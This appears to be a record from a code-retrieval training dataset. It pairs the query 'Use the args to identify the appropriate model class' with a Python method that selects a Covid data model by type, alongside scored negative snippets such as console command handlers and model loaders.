2):len(b)]\n\n b21 = b[int(len(b) / 2):len(b)]\n for index, row in enumerate(b21):\n b21[index] = row[0:int(len(row) / 2)]\n\n b22 = b[int(len(b) / 2):len(b)]\n for index, row in enumerate(b22):\n b22[index] = row[int(len(b) / 2):len(b)]\n\n c11 = matrix_add(recursive_multiply(a11, b11), recursive_multiply(a12, b21)) # C11 = A11*B11 + A12*B21\n c12 = matrix_add(recursive_multiply(a11, b12), recursive_multiply(a12, b22)) # C12 = A11*B12 + A12*B22\n c21 = matrix_add(recursive_multiply(a21, b11), recursive_multiply(a22, b21)) # C21 = A21*B11 + A22*B21\n c22 = matrix_add(recursive_multiply(a21, b12), recursive_multiply(a22, b22)) # C22 = A21*B12 + A22*B22\n\n # Append c12 to c11\n for row_index, row in enumerate(c11):\n for col_index, col in enumerate(c12):\n row.append(c12[row_index][col_index])\n\n # Append c22 to c21\n for row_index, row in enumerate(c21):\n for col_index, col in enumerate(c12):\n row.append(c22[row_index][col_index])\n\n # Append c21 to c11\n for i in c21:\n c11.append(i)\n\n return c11", "def multiply(num1, num2):\n return num1 * num2", "def iloczyn(a, b) -> int:\n 
return a*b", "def instruction_mult(self, register, a, b):\n if Vm.is_register(a):\n a = self.get_register(a)\n\n if Vm.is_register(b):\n b = self.get_register(b)\n\n result = (a * b) % MAX_INT\n\n self.set_register(register, result)", "def _multiply(self, other):\n raise NotImplementedError(\n \"{} does not support scalar multiplication\".format(type(self)))", "def multiply(num1, num2):\n return num1 * num2", "def multiply(num1, num2):\n return num1 * num2", "def matrix_multiply(self, Am, Bm):\r\n # Section 1: Ensure A & B dimensions are correct for multiplication\r\n rowsA = len(Am)\r\n colsA = len(Am[0])\r\n rowsB = len(Bm)\r\n colsB = len(Bm[0])\r\n if colsA != rowsB:\r\n raise ArithmeticError(\r\n 'Number of A columns must equal number of B rows.')\r\n \r\n # Section 2: Store matrix multiplication in a new matrix\r\n C = self.zeros_matrix(rowsA, colsB)\r\n for i in range(rowsA):\r\n for j in range(colsB):\r\n total = 0\r\n for ii in range(colsA):\r\n total += Am[i][ii] * Bm[ii][j]\r\n C[i][j] = total\r\n \r\n return C" ]
[ "0.7423531", "0.7327661", "0.73207116", "0.7261051", "0.72316414", "0.7190819", "0.71892846", "0.7182553", "0.7133698", "0.71076566", "0.7082618", "0.7080708", "0.7065419", "0.7065419", "0.7065419", "0.7065419", "0.7065419", "0.7064199", "0.70600754", "0.7036849", "0.7033024", "0.7018727", "0.7000787", "0.7000787", "0.7000787", "0.69855976", "0.6958528", "0.6956128", "0.69492805", "0.69492805", "0.6914658", "0.6828035", "0.68266", "0.68237174", "0.6811537", "0.6798854", "0.6791022", "0.67532367", "0.67390037", "0.67328674", "0.6719245", "0.6711404", "0.6708093", "0.6694379", "0.6685654", "0.66725224", "0.6649492", "0.6586256", "0.6578328", "0.65743506", "0.65717965", "0.65702283", "0.65688777", "0.6564086", "0.65573305", "0.65532786", "0.6551839", "0.6540696", "0.6514019", "0.65027505", "0.650133", "0.6493684", "0.6473748", "0.64712954", "0.64656824", "0.64550877", "0.64546084", "0.64437896", "0.6443434", "0.6438388", "0.64174587", "0.64090973", "0.6395859", "0.63936645", "0.63818043", "0.6368792", "0.63662344", "0.6364198", "0.63569933", "0.6349751", "0.6343795", "0.63263166", "0.6323165", "0.6321453", "0.6314445", "0.631375", "0.6305456", "0.63052344", "0.63007766", "0.62921965", "0.62879336", "0.6286482", "0.6285695", "0.62822634", "0.6281268", "0.62791336", "0.62732655", "0.6271101", "0.6269742", "0.6269742", "0.6257278" ]
0.0
-1
Use the args to identify the appropriate model class
def __createCovidModelInstance(self, *args, **kwargs): try: if 'MODEL_TYPE' in kwargs: if kwargs['MODEL_TYPE'] == CovidModel.AGGREGATE_CASES_DECEASED: covidModel = CovidAggregateTotals() self.CovidData = covidModel.getData(*args,**kwargs) self.DataAvailable=self.__isDataAvailable(self.CovidData) return if kwargs['MODEL_TYPE'] == CovidModel.MONTHLY_CASES_DECEASED: covidModel = CovidMonthlyTotals() self.CovidData = covidModel.getData(*args,**kwargs) self.DataAvailable=self.__isDataAvailable(self.CovidData) return if kwargs['MODEL_TYPE'] == CovidModel.PAST_30_DAYS: covidModel = CovidDailyTotals() self.CovidData = covidModel.getData(*args,**kwargs) self.DataAvailable=self.__isDataAvailable(self.CovidData) return if kwargs['MODEL_TYPE'] == CovidModel.MESSAGES: covidModel = CovidMessages() self.CovidData = covidModel.getData(*args,**kwargs) self.DataAvailable=self.__isDataAvailable(self.CovidData) return if kwargs['MODEL_TYPE'] == CovidModel.LOCATIONS: covidModel = CovidLocationInfo() self.CovidData = covidModel.getData(*args,**kwargs) self.DataAvailable=self.__isDataAvailable(self.CovidData) return print ("CovidMessages.__createCovidModelInstance() - did not receive a recognizable model type - no model object instantiated. Args received = ",kwargs) return None except: print ("CovidMessages.__createCovidModelInstance() - unexpected error: ",sys.exc_info()[0]) return None
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def choose_class(self, *args, **kwargs):", "def convert_to_model(self, *args):", "def do_create(self, argv):\n if argv in self.__names:\n new_instance = self.__names[argv]()\n new_instance.save()\n print(\"{}\".format(new_instance.id))\n elif len(argv) is 0:\n print(\"** class name missing **\")\n elif argv is not \"BaseModel\":\n print(\"** class doesn't exist **\")", "def object_cmd(args):\n if len(args) >= 1:\n a = [ args[0], 0 ]\n model_cmd(a)\n else:\n error(\"Usage...\")", "def _class(self, *args):\r\n\r\n if hasattr(args[0], '__mro__'):\r\n #this is a class\r\n return args[0]\r\n else:\r\n #this is an instance\r\n return type(args[0])", "def do_create(self, arg):\n if not arg:\n print('** class name missing **')\n return\n args = arg.split(\" \")\n if args[0] not in self.__classes:\n print(\"** class doesn't exist **\")\n else:\n obj = eval(args[0])()\n obj.save()\n print(obj.id)", "def __init__(self, name, *model_args):\n assert name != None\n self.name = name\n self._models = {}\n self._parent = None #Model instance\n self._loader = None\n self._loaded = True\n for model_arg in model_args:\n m = self.model_class(**model_arg)\n self.add(m)", "def do_create(self, args):\n args = shlex.split(args)\n if not args:\n print(\"** class name missing **\")\n elif not args[0] in name_of_class:\n print(\"** class doesn't exist **\")\n else:\n new_obj = eval(args[0])()\n new_obj.save()\n print(new_obj.id)", "def do_create(self, args):\n if not args:\n print(\"** class name missing **\")\n elif args in HBNBCommand.class_check:\n\n lists = args.split()\n obj = eval(\"{}()\".format(lists[0]))\n obj.save()\n print(obj.id)\n storage.reload()\n\n else:\n print(\"** class doesn't exist **\")", "def use_args(args):\n global DATA_PATH\n global IMAGES_FILE\n global WORKING_DIR\n global OUTPUT_DIR\n global OUTPUT_FILE_NAME\n global OUTPUT_FILE\n global LOAD_INDEXES\n global INDEXES_DIR\n global MODEL\n global JOIN_MODELS\n global MODEL1\n global MODEL2\n global ALL_TOGETHER\n global TRAINED_MODELS\n global TRAINED_MODELS_DIR\n global TRAINED_MODELS_DIR2\n global TRAINED_MODELS_DIRS\n global CROSS_VALIDATION\n global TRAIN_EPOCHS\n global FEATURES\n \n if args.data_path:\n # Change the default path of the images\n DATA_PATH = args.data_path\n IMAGES_FILE = os.path.join(DATA_PATH, IMAGES_FILE_NAME)\n \n if args.working_dir:\n # Change the default path of the working directory\n WORKING_DIR = args.working_dir\n OUTPUT_DIR = WORKING_DIR\n OUTPUT_FILE = os.path.join(OUTPUT_DIR, OUTPUT_FILE_NAME)\n \n if args.output_dir:\n # Change the default path of the output directory\n OUTPUT_DIR = os.path.join(WORKING_DIR, args.output_dir)\n OUTPUT_FILE = os.path.join(OUTPUT_DIR, OUTPUT_FILE_NAME)\n \n if args.output:\n # Change the default name of the output file\n OUTPUT_FILE_NAME = args.output\n OUTPUT_FILE = os.path.join(OUTPUT_DIR, OUTPUT_FILE_NAME)\n \n if args.indexes_dir:\n # Load random and train indexes from file\n LOAD_INDEXES = True\n INDEXES_DIR = args.indexes_dir\n \n if args.model:\n # Select model\n MODEL = args.model\n \n if args.models:\n \n if not args.trained_models_dirs:\n raise Exception(\"Arg. `-M --models` requires arg. 
\"\n + \"`-T --trained_models_dirs`\")\n \n # Models to combine\n JOIN_MODELS = True\n MODEL1 = args.models[0]\n MODEL2 = args.models[1]\n \n if args.trained_models_dir:\n # Load trained models from file\n TRAINED_MODELS = True\n TRAINED_MODELS_DIR = args.trained_models_dir\n \n if args.trained_models_dirs:\n # Load trained models from file\n TRAINED_MODELS = True\n TRAINED_MODELS_DIR = args.trained_models_dirs[0]\n TRAINED_MODELS_DIR2 = args.trained_models_dirs[1]\n \n if args.all_together:\n # The four models together\n ALL_TOGETHER = True\n TRAINED_MODELS_DIRS = args.all_together\n \n if args.cross_validation:\n # Activate cross_validation\n CROSS_VALIDATION = True\n \n if args.train_epochs:\n # Change the default number of train epochs\n TRAIN_EPOCHS = args.train_epochs\n \n if args.features:\n # Nuber of best features to use\n FEATURES = args.features", "def get_SrcClass(args):\n return Reactome(args)", "def modelClass(self):\n raise NotImplementedError", "def do_create(self, *args):\n \"\"\" args without commas created a tuple of 1, so I created a list with\n the tuple being split by spaces \"\"\"\n args = [ele for ele in args[0].split(' ')]\n if args[0] == '':\n print(\"** class name missing **\")\n return\n if args[0] not in self.list_classes:\n print(\"** class doesn't exist **\")\n return\n newinstance = eval(\"{}()\".format(args[0]))\n newinstance.save()\n print(newinstance.id)", "def do_create(self, args):\n args = shlex.split(args)\n if len(args) == 0:\n print(\"** class name missing **\")\n return False\n if args[0] in classes:\n instance = eval(args[0])()\n else:\n print(\"** class doesn't exist **\")\n return False\n print(instance.id)\n instance.save()", "def __init__(self, *args, **kwargs):\n if (args and type(args) is dict):\n BaseModel.__init__(self, args[0])\n else:\n BaseModel.__init__(self)", "def __init__(self, model: str, **kwargs):\n super().__init__(model=model)", "def get_model(*args):\n return Model()", "def do_create(self, arg):\n\n args = shlex.split(arg)\n if len(args) == 0:\n print(\"** class name missing **\")\n\n elif args[0] in models.classes:\n new_instance = models.classes[args[0]]()\n print(new_instance.id)\n \"\"\"saves it (to the JSON file) \"\"\"\n models.storage.save()\n\n else:\n print(\"** class doesn't exist **\")", "def _build_model(self, **kwargs):\n pass", "def build_model(cls, args, task):\n raise NotImplementedError(\"Model must implement the build_model method\")", "def prepare_model(self, **kwargs):\n pass", "def do_create(self, arg):\n args = shlex.split(arg)\n if len(args) == 0:\n print(\"** class name missing **\")\n return False\n if args[0] in class_type:\n new_inst = class_type[args[0]]()\n else:\n print(\"** class doesn't exist **\")\n return False\n print(new_inst.id)\n new_inst.save()", "def default(self, arg):\n args = arg.split('.')\n stored_objects = models.storage.all()\n if len(args) == 2:\n if args[0] in models.classes:\n self.get_func(args[0], args[1], stored_objects)\n else:\n print(\"** class doesn't exist **\")\n else:\n super().default(arg)", "def do_create(self, args):\n args = args.split()\n l = len(args)\n if l < 1:\n print(\"** class name missing **\")\n else:\n if args[0] in HBNBCommand.valid_classes.keys():\n if l == 1:\n new_obj = HBNBCommand.valid_classes[args[0]]()\n else:\n result = self.__create_help(args[1:])\n if result is None:\n print(\"** Object fails **\")\n return\n new_obj = HBNBCommand.valid_classes[args[0]](**result)\n print(new_obj.id)\n new_obj.save()\n else:\n print(\"** class doesn't exist 
**\")", "def do_create(self, arg):\n if not arg:\n print(\"** class name missing **\")\n return\n if arg not in HBNBCommand.class_list:\n print(\"** class doesn't exist **\")\n return\n obj = eval(arg + \"()\")\n obj.save()\n print(obj.id)", "def __init__(self, source, target, model_cls):\n self.model_cls = model_cls\n super().__init__(source, target)", "def do_create(self, arg):\n args = arg.split()\n if len(args) == 0:\n print(\"** class name missing **\")\n return\n if args[0] in self.class_dict:\n new = self.class_dict.get(args[0])()\n storage.save()\n print(new.id)\n else:\n print(\"** class doesn't exist **\")", "def __init__(self, **kwargs):\n super(Model, self).__init__(**kwargs)", "def do_update(self, args):\n args = shlex.split(args)\n if len(args) == 0:\n print(\"** class name missing **\")\n return False\n elif args[0] in classes:\n if len(args) > 1:\n k = args[0] + \".\" + args[1]\n if k in models.storage.all():\n if len(args) > 2:\n if len(args) > 3:\n try:\n if isinstance(args[2], datetime) is True:\n pass\n if args[0] in classes:\n if isinstance(args[2], ints) is True:\n args[3] = int(args[3])\n elif isinstance(args[2], floats) is True:\n args[3] = float(args[3])\n except:\n pass\n setattr(models.storage.all()[k], args[2], args[3])\n models.storage.all()[k].save()\n else:\n print(\"** value missing **\")\n else:\n print(\"** attribute name missing **\")\n else:\n print(\"** no instance found **\")\n else:\n print(\"** instance id missing **\")\n else:\n print(\"** class doesn't exist **\")", "def build_model(self, **kwargs):\n raise NotImplementedError()", "def __init__(self, model: Type[ModelType]):\n self.model = model", "def __init__(self, model: Type[ModelType]):\n self.model = model", "def __init__(self, args):\n self.args = args", "def validate_class_args(self, **kwargs):\n pass", "def cmd_type(args):", "def __init__(self, model):\n self.model = model", "def __init__(self, model):\n self.model = model", "def __init__(self, model):\n self.model = model", "def __init__(self, model):\n self.model = model", "def get_model_args(args):\r\n global MODEL_ARCHITECTURE, MODEL_OPTIMIZER, ADVANCED_OPTIONS, \\\r\n DATA_OPTIONS, BERT_CONFIG\r\n\r\n required_args = MODEL_ARCHITECTURE | MODEL_OPTIMIZER | ADVANCED_OPTIONS \\\r\n | DATA_OPTIONS | BERT_CONFIG\r\n\r\n arg_values = {k: v for k, v in vars(args).items() if k in required_args}\r\n return argparse.Namespace(**arg_values)", "def evaluate_single_model_unpack_args(args):\n return evaluate_single_model(*args)", "def do_update(self, arg):\n if len(arg) == 0:\n print(\"** class name missing **\")\n return\n coms = tuple(arg.split())\n if coms[0] not in self.cls:\n print(\"** class doesn't exist **\")\n elif len(coms) < 2:\n print(\"** instance id missing **\")\n return\n obj = coms[0] + \".\" + coms[1]\n if obj not in storage.all().keys():\n print(\"** no instance found **\")\n elif len(coms) < 3:\n print(\"** attribute name missing **\")\n elif len(coms) < 4:\n print(\"** value missing **\")\n else:\n typecast = type(eval(coms[3]))\n form = coms[3].strip('\"')\n form = form.strip(\"'\")\n setattr(storage.all()[obj], coms[2], typecast(form))", "def __init__(self, model: object):\n self.model = model", "def do_create(self, args):\n\n if len(args) == 0:\n print(\"** class name missing **\")\n return\n token = args.split()\n\n try:\n nwInstance = eval(token[0])()\n nwInstance.save()\n print(nwInstance.id)\n except:\n print(\"** class doesn't exist **\")", "def do_create(self, arg):\n if len(arg) is 0:\n print(\"** class name missing 
**\")\n elif arg not in self.dict.keys():\n print(\"** class doesn't exist **\")\n\n else:\n\n created = self.dict[arg]()\n created.save()\n\n print(created.id)", "def model(self):", "def model(self):", "def model(self):", "def model(self):", "def model(self):", "def __init__(self, model):\n\t\tself.model = model", "def parse(cls, model_path: str, **kwargs):", "def make_model():\n m = model_class(*argv[2:-1])\n modelobj[\"model\"] = m", "def __init__(self, args):\n super().__init__()\n self.args = args\n # get the controller using the command line arguments\n self.get_controller(args)", "def __init__(self, model_uri: str = None, method: str = \"predict\", modelUri: str = None, type: str = None):\n super().__init__()\n print(model_uri, modelUri, type)\n self.model_uri = model_uri\n self.method = method\n self.ready = False\n self.load()", "def build_model():", "def get_model(name, **model_args):\n module = importlib.import_module('.' + name, 'models')\n return module.build_model(**model_args)", "def do_update(self, *args):\n if len(args) == 1:\n args = [ele for ele in args[0].split(' ')]\n if args[0] == '':\n print(\"** class name missing **\")\n return\n if args[0] not in self.list_classes:\n print(\"** class doesn't exist **\")\n return\n if len(args) < 2:\n print(\"** instance id missing **\")\n return\n elif len(args) < 3:\n print(\"** attribute name missing **\")\n return\n elif len(args) < 4:\n print(\"** value missing **\")\n return\n\n storage.reload()\n dict_objs = storage.all()\n if dict_objs is None or dict_objs == []:\n print(\"** no instance found **\")\n return\n\n key = \"{}.{}\".format(args[0], args[1])\n if key in dict_objs.keys():\n obj = dict_objs[key]\n if args[2] in obj.__class__.__dict__:\n obj.__dict__[args[2]] =\\\n type(obj.__class__.__dict__[args[2]])(args[3])\n else:\n obj.__dict__[args[2]] = args[3]\n storage.save()\n else:\n print(\"** no instance found **\")", "def __init__(self, *args):\n this = _libsbml.new_ModelCreator(*args)\n try: self.this.append(this)\n except: self.this = this", "def initialize(self, args):\n # You must parse model_config. 
JSON string is not parsed here\n self.model_config = json.loads(args['model_config'])\n print(\"model_config:\", self.model_config)\n\n self.input_names = []\n for input_config in self.model_config[\"input\"]:\n self.input_names.append(input_config[\"name\"])\n print(\"postprocess input names:\", self.input_names)\n\n self.output_names = []\n self.output_dtype = []\n for output_config in self.model_config[\"output\"]:\n self.output_names.append(output_config[\"name\"])\n dtype = pb_utils.triton_string_to_numpy(output_config[\"data_type\"])\n self.output_dtype.append(dtype)\n print(\"postprocess output names:\", self.output_names)\n self.postprocessor = fd.vision.ocr.DBDetectorPostprocessor()\n self.cls_preprocessor = fd.vision.ocr.ClassifierPreprocessor()\n self.rec_preprocessor = fd.vision.ocr.RecognizerPreprocessor()\n self.cls_threshold = 0.9", "def _run(self, args: argparse.Namespace) -> int:\n log.set_log_level_from_args(args)\n return self.replicate_object(args.model, args)", "def __init__(self, *args):\n\n self.args = args", "def __init__(self, *args):\n\n self.args = args", "def model_arg_parse(cls, parser):\r\n # for mslite config\r\n parser.add_argument('--thread_affinity_mode',\r\n type=int,\r\n default=2,\r\n help='thread affinity number for mslite inference')\r\n\r\n parser.add_argument('--thread_num',\r\n type=int,\r\n default=1,\r\n help='thread number for mslite inference')\r\n\r\n parser.add_argument('--mslite_model_type',\r\n type=int,\r\n default=0,\r\n choices=[0, 4],\r\n help='input model type for mslite inference, '\r\n '0 for MINDIR, 4 for MINDIR_LITE')\r\n\r\n parser.add_argument('--ascend_provider',\r\n type=str,\r\n default='',\r\n choices=['', 'ge'],\r\n help=\"Ascend infer method: '' for acl, 'ge' for GE\")\r\n\r\n # for tensorrt infer\r\n parser.add_argument('--tensorrt_optim_input_shape',\r\n type=str,\r\n default=None,\r\n help='optim input shape for tensorrt'\r\n 'with key tensor name (str) '\r\n 'and value shape info(List[int])')\r\n\r\n parser.add_argument('--tensorrt_min_input_shape',\r\n type=str,\r\n default=None,\r\n help='optim input shape for tensorrt'\r\n 'with key tensor name (str) '\r\n 'and value shape info(List[int])')\r\n\r\n parser.add_argument('--tensorrt_max_input_shape',\r\n type=str,\r\n default=None,\r\n help='optim input shape for tensorrt'\r\n 'with key tensor name (str) '\r\n 'and value shape info(List[int])')\r\n\r\n parser.add_argument('--gpu_memory_size',\r\n type=int,\r\n default=100,\r\n help='gpu init memory size(M)')\r\n\r\n parser.add_argument('--is_enable_tensorrt',\r\n type=bool,\r\n default=False,\r\n help=\"flag indicate whether use tensorrt engine\")\r\n\r\n parser.add_argument('--is_fp16',\r\n type=bool,\r\n default=False,\r\n help=\"flag indicate whether apply fp16 infer\")\r\n\r\n parser.add_argument('--is_int8',\r\n type=bool,\r\n default=False,\r\n help=\"flag indicate whether apply int8 infer\")", "def test_model_found(arguments):\n ...", "def __init__(self, model: str, **kwargs):\n\n super().__init__(model=model, **kwargs)\n logger.info('load model done')", "def __init__(self,given_type):\n self.given_type=given_type", "def get_model(model_name: str, *args, **kwargs):\n try:\n if '.' in model_name:\n module_name, class_name = model_name.rsplit('.', 1)\n else:\n module_name = model_name\n class_name = model_name.capitalize().replace(\"_\",\"\")\n\n model_module = import_module('.' 
+ module_name, package='models')\n\n model_class = getattr(model_module, class_name)\n\n instance = model_class(*args, **kwargs)\n\n except (AttributeError, ModuleNotFoundError):\n raise ImportError('{} is not part of our model/architecture collection.'.format(model_name))\n else:\n if not issubclass(model_class, Model):\n raise ImportError(\"{} is not a valid model/architecture.\".format(model_class))\n\n return instance", "def do_update(self, args):\n args = args.split()\n if len(args) == 0:\n print(\"** class name missing **\")\n return\n if len(args) == 1:\n print(\"** instance id missing **\")\n return\n if len(args) == 2:\n print(\"** attribute name missing **\")\n return\n if len(args) == 3:\n print(\"** value missing **\")\n return\n if args[0] not in HBNBCommand.valid_classes.keys():\n print(\"** class doesn't exist **\")\n return\n all_objs = storage.all(args[0])\n for k, v in all_objs.items():\n if k == args[1]:\n setattr(v, args[2], args[3])\n storage.save()\n return\n print(\"** no instance found **\")", "def model(self) -> str:\n ...", "def do_update(self, args):\n args = shlex.split(args)\n if len(args) == 0:\n print(\"** class name missing **\")\n elif not args[0] in class_type:\n print(\"** class doesn't exist **\")\n elif len(args) == 1:\n print(\"** instance id missing **\")\n elif (\"{}.{}\".format(args[0], args[1]) not in storage.all().keys()):\n print(\"** no instance found **\")\n elif len(args) == 2:\n print(\"** attribute name missing **\")\n elif len(args) == 3:\n print(\"** value missing **\")\n else:\n new_dict = models.storage.all()\n tmp = \"{}.{}\".format(args[0], args[1])\n if tmp in new_dict.keys():\n attr = getattr(new_dict[tmp], args[2], \"\")\n setattr(new_dict[tmp], args[2], type(attr)(args[3]))\n new_dict[tmp].save()", "def __init__(self, **kwargs):\n\n def paraChck(**kwargs):\n \"\"\"\n check and validate the keyword argument input\n \"\"\"\n import sys\n\n \n def_val = {\n 'x_train':None,\n 'y_train':None,\n 'x_test':None,\n 'y_test':None,\n 'channel':1,\n 'input_img_cols':72,\n 'input_img_rows':72,\n 'nb_classes':13,\n 'nb_epoch': 5,\n 'batch_size' : 16,\n 'dict_label' : None} # default parameteters value\n\n diff = set(kwargs.keys()) - set(def_val.keys())\n if diff:\n print(\"Invalid args:\",tuple(diff),file=sys.stderr)\n return\n\n def_val.update(kwargs)\n return def_val\n \n def_val = paraChck(**kwargs)\n\n class Bunch(object):\n def __init__(self, adict):\n self.__dict__.update(adict)\n \n self.x_train = def_val['x_train']\n self.y_train = def_val['y_train']\n self.x_test = def_val['x_test']\n self.y_test = def_val['y_test']\n self.channels = def_val['channel']\n self.input_img_rows = def_val['input_img_rows']\n self.input_img_cols = def_val['input_img_cols']\n self.nb_classes = def_val['nb_classes']\n self.plot_model = None\n self.model = None\n self.nb_epoch = def_val['nb_epoch']\n self.batch_size = def_val['batch_size']\n self.dict_label = def_val['dict_label']\n \n # default label dictionary if users do not provide\n values = ['label_' + str(i).zfill(2) for i in range(0,self.nb_classes)]\n keys = range(self.nb_classes) \n \n if self.dict_label is None:\n self.dict_label = dict(zip(keys, values))\n else:\n self.dict_label = kwargs['dict_label']\n \n self.dict_factor = {v: k for k, v in self.dict_label.items()}", "def train(self, model, args):\n if model == self.WORD_DET_RFC:\n return self.train_rfc(args)\n elif model == self.REGRESSION_PARAMS:\n return self.train_bb_reg(args)\n else:\n raise Exception('No model %s exists to train' % model)", 
"def build_model_fn(self):", "def __init__(self, *args):\n this = _libsbml.new_QualModelPlugin(*args)\n try: self.this.append(this)\n except: self.this = this", "def do_update(self, arg):\n arg = arg.split()\n try:\n h = arg[0] + \".\" + arg[1]\n except:\n pass\n objects = storage.all()\n if len(arg) is 0:\n print(\"** class name missing **\")\n elif len(arg) == 1 and arg[0] in self.dict.keys():\n print(\"** instance id missing **\")\n elif arg[0] not in self.dict.keys():\n print(\"** class doesn't exist **\")\n elif h not in objects.keys():\n print(\"** no instance found **\")\n elif len(arg) <= 2:\n print(\"** attribute name missing **\")\n elif len(arg) <= 3:\n print(\"** value missing **\")\n else:\n setattr(objects[h], arg[2], arg[3])\n storage.save()", "def build_model(cls, args):\n base_architecture(args) \n return StyleGANGeneratorPretrain(args)", "def _get_model(self, fl_ctx: FLContext):\n if isinstance(self.model, str):\n # treat it as model component ID\n model_component_id = self.model\n engine = fl_ctx.get_engine()\n self.model = engine.get_component(model_component_id)\n if not self.model:\n self.log_error(fl_ctx, f\"cannot find model component '{model_component_id}'\")\n return\n if self.model and isinstance(self.model, dict):\n # try building the model\n try:\n engine = fl_ctx.get_engine()\n # use provided or default optimizer arguments and add the model parameters\n if \"args\" not in self.model:\n self.model[\"args\"] = {}\n self.model = engine.build_component(self.model)\n except Exception as e:\n self.system_panic(\n f\"Exception while parsing `model`: \" f\"{self.model} with Exception {e}\",\n fl_ctx,\n )\n return\n if self.model and not isinstance(self.model, torch.nn.Module):\n self.system_panic(fl_ctx, f\"expect model to be torch.nn.Module but got {type(self.model)}: {self.model}\")\n return\n if self.model is None:\n self.system_panic(fl_ctx, f\"Model wasn't built correctly! 
It is {self.model}\")\n return\n self.log_info(fl_ctx, f\"Running model {self.model}\")", "def testModel( self, classTest, classPred):", "def get_model_class(class_name, kwargs={}):\n # , Perceptron, PassiveAggressiveRegressor\n # , NuSVR, LinearSVR\n\n if class_name == 'LinearRegression':\n from sklearn.linear_model import LinearRegression\n return LinearRegression(**kwargs)\n\n if class_name == 'SGDRegressor':\n from sklearn.linear_model import SGDRegressor\n return SGDRegressor(**kwargs)\n\n if class_name == 'SVR':\n from sklearn.svm import SVR\n return SVR(**kwargs)\n\n if class_name == 'DecisionTreeRegressor':\n from sklearn.tree import DecisionTreeRegressor\n return DecisionTreeRegressor(**kwargs)\n\n if class_name == 'ExtraTreesRegressor':\n from sklearn.ensemble import ExtraTreesRegressor\n return ExtraTreesRegressor(**kwargs)\n\n if class_name == 'KNeighborsRegressor':\n from sklearn.neighbors import KNeighborsRegressor\n return KNeighborsRegressor(**kwargs)\n\n if class_name == 'MLPRegressor':\n from sklearn.neural_network import MLPRegressor\n return MLPRegressor(**kwargs)\n\n raise Exception(\"Unknown Model class\")", "def __init__(self, classification, extras=[]):\n self.model_list = []\n self._generate_model_list(classification)\n self.model_list.extend(extras)\n self.classification = classification", "def do_new(self, args):\n model_name = questionary.text(\"Target name:\").ask()\n model_name = model_name.replace(\" \", \"\")\n\n available_frameworks = list(CFState.get_instance().loaded_frameworks.keys())\n framework_choice = questionary.select(\"Which framework?\", choices=available_frameworks).ask()\n\n if \"textattack\" in framework_choice:\n framework = \"TextTarget\"\n elif \"art\" in framework_choice:\n framework = \"ArtTarget\"\n else:\n raise ValueError(\"invalid framework\")\n\n if framework == \"TextTarget\":\n model_data_type = \"text\"\n elif framework == \"ArtTarget\":\n model_data_type = questionary.select(\"What data type?\", choices=[\"numpy\", \"image\"]).ask()\n else:\n raise ValueError(\"invalid framework\")\n\n if model_name not in os.listdir(config.targets_path):\n try:\n os.mkdir(f\"{config.targets_path}/{model_name}\")\n open(f\"{config.targets_path}/{model_name}/__init__.py\", \"w\").close()\n with open(f\"{config.targets_path}/{model_name}/{model_name}.py\", \"w\") as f:\n f.write(\n f\"\"\"\n\n# Generated by counterfit #\n\nfrom counterfit.core.targets import {framework}\n\nclass {model_name.capitalize()}({framework}):\n model_name = \"{model_name.lower()}\"\n model_data_type = \"{model_data_type}\"\n model_endpoint = \"\"\n model_input_shape = ()\n model_output_classes = []\n X = []\n\n def __init__(self):\n self.X = []\n\n def __call__(self, x):\n return x\n\"\"\"\n )\n\n CFState.get_instance().import_targets()\n except Exception as e:\n\n self.pwarning(f\"\\n [!] Failed to write target file: {e}.\\n\")\n\n else:\n self.pwarning(f\"\\n [!] {model_name} already exists. 
Choose a new name.\\n\")", "def load_model(self) -> Any:", "def __init__(self, model):\n self._model = model", "def main(args):\n # ------------------------\n # 1 INIT LIGHTNING MODEL\n # ------------------------\n model = LightningTemplateModel(**vars(args))\n\n # ------------------------\n # 2 INIT TRAINER\n # ------------------------\n trainer = Trainer.from_argparse_args(args)\n\n # ------------------------\n # 3 START TRAINING\n # ------------------------\n trainer.fit(model)", "def __init__(self, **kwargs):\n super(Model, self).__init__(**kwargs)\n self._params = self.find_params()", "async def gpt2_set_model(self, ctx, *, arg=None):\n print('Command gpt2_set_model triggered')\n if arg:\n if arg in VALID_DEFAULT_MODELS:\n self.update_config(model_name=arg)\n else:\n await ctx.send(f\"ERROR: Invalid model name {arg}\")\n else:\n await ctx.send(\"ERROR: Argument required\")", "def __init__(self, student, teachers, args, name):\n\n super(CachedKDModel, self).__init__(args, \"cached_\" + name)\n\n # Init base models\n self.student = student\n self.teachers = teachers", "def handle(self, *args, **kwargs):\n # Part model\n try:\n print(\"Rebuilding Part objects\")\n\n from part.models import Part\n Part.objects.rebuild()\n except Exception:\n print(\"Error rebuilding Part objects\")\n\n # Part category\n try:\n print(\"Rebuilding PartCategory objects\")\n\n from part.models import PartCategory\n PartCategory.objects.rebuild()\n except Exception:\n print(\"Error rebuilding PartCategory objects\")\n\n # StockItem model\n try:\n print(\"Rebuilding StockItem objects\")\n\n from stock.models import StockItem\n StockItem.objects.rebuild()\n except Exception:\n print(\"Error rebuilding StockItem objects\")\n\n # StockLocation model\n try:\n print(\"Rebuilding StockLocation objects\")\n\n from stock.models import StockLocation\n StockLocation.objects.rebuild()\n except Exception:\n print(\"Error rebuilding StockLocation objects\")\n\n # Build model\n try:\n print(\"Rebuilding Build objects\")\n\n from build.models import Build\n Build.objects.rebuild()\n except Exception:\n print(\"Error rebuilding Build objects\")", "def do_update(self, arg):\n if type(arg) == str:\n arg_list = shlex.shlex(arg)\n arg_list.wordchars += \"-\"\n arg_list = list(arg_list)\n try:\n idx_start = arg_list.index(\"[\")\n idx_end = arg_list.index(\"]\")\n list_str = \"\".join(arg_list[idx_start:idx_end + 1])\n list_str = eval(list_str)\n list_start = arg_list[:idx_start]\n list_end = arg_list[idx_end + 1:]\n arg_list = list_start\n arg_list.append(list_str)\n arg_list.extend(list_end)\n except ValueError:\n pass\n else:\n arg_list = arg\n if not arg:\n print(\"** class name missing **\")\n return\n if arg_list[0] not in HBNBCommand.class_list:\n print(\"** class doesn't exist **\")\n return\n if len(arg_list) < 2:\n print(\"** instance id missing **\")\n return\n key = arg_list[0] + \".\" + arg_list[1]\n if key not in storage.all():\n print(\"** no instance found **\")\n return\n if len(arg_list) == 3 and type(arg_list[2]) == dict:\n obj = storage.all()[key]\n for key, val in arg_list[2].items():\n setattr(obj, key, val)\n obj.save()\n return\n if len(arg_list) < 3:\n print(\"** attribute name missing **\")\n return\n if len(arg_list) < 4:\n print(\"** value missing **\")\n return\n obj 